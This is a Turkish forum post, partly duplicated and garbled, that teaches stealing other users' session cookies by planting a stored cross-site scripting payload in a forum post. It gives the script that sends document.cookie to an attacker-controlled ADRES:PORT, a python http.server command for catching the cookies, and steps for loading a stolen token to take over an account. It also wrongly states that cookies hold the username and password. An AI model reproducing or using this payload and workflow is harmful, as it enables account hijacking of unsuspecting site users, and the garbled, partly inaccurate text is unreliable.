- 12 Eyl 2023
- 79
- 30
Herkes en az bir kez karşılaşmıştır bu cookilerle sağda solda biryerlerde çıkar insanı rahatsız ettirir ve zorla kendini kabul ettirir
Cookie örneği vericek olursa şöyle varsayalım: Facebook'a giriş yaptınız çıktınız ve tekrar girdiğiniz, girdiğinizde sizden ne şifre nede kullanıcı adı istedi bunun sebebi tarayıcımıza kaydedilen cookie'dir kullanıcı adı ve şifren cookie'de durur ve sen bu siteye istek attığında cookie'lerde istekle beraber gider.
Eğer başka birinin cookie bilgisini alırsak o kişi üzerinden işlem yapabiliriz.
Başka bir örnek verelim bir forum sitesine giriş yaptınız ve post paylaştınız. Bu şekilde bu posta bir tuzak yerleştirebiliriz. Bunun için bir script kullanıcağız, scriptimiz bu
bu scripti postun başlığına, açıklamasına yerleştirebiliriz. Bunları yaptıktan sonra posta tıklayan kişilerin cookie bilgileri bizim web sunucumuza gelicektir yani
yazan kısma.
kısmında ne yapıcağınızı şaşırdıysanız `python -m http.server 80` komutunu kullanabilirsiniz. Bu komut bulunduğunuz dizinin web halidir. Ee bizim cookie'ler nerede dicek olursanız cookie'ler terminal ekranına düşücektir.
Bu cookie'leri kullanarak hesaplara giriş yapmak için F12 tuşuna basıp token kısmından tokeni değişebilirsiniz. Cookie Editor gibi eklentilerde kullanılabilir.
Cookie örneği vericek olursa şöyle varsayalım: Facebook'a giriş yaptınız çıktınız ve tekrar girdiğiniz, girdiğinizde sizden ne şifre nede kullanıcı adı istedi bunun sebebi tarayıcımıza kaydedilen cookie'dir kullanıcı adı ve şifren cookie'de durur ve sen bu siteye istek attığında cookie'lerde istekle beraber gider.
Eğer başka birinin cookie bilgisini alırsak o kişi üzerinden işlem yapabiliriz.
Başka bir örnek verelim bir forum sitesine giriş yaptınız ve post paylaştınız. Bu şekilde bu posta bir tuzak yerleştirebiliriz. Bunun için bir script kullanıcağız, scriptimiz bu
Kod:
<script> fetch("http://ADRES:PORT/"+document.cookie) </script>
Kod:
ADRES:PORT
Kod:
ADRES:PORT
Bu cookie'leri kullanarak hesaplara giriş yapmak için F12 tuşuna basıp token kısmından tokeni değişebilirsiniz. Cookie Editor gibi eklentilerde kullanılabilir.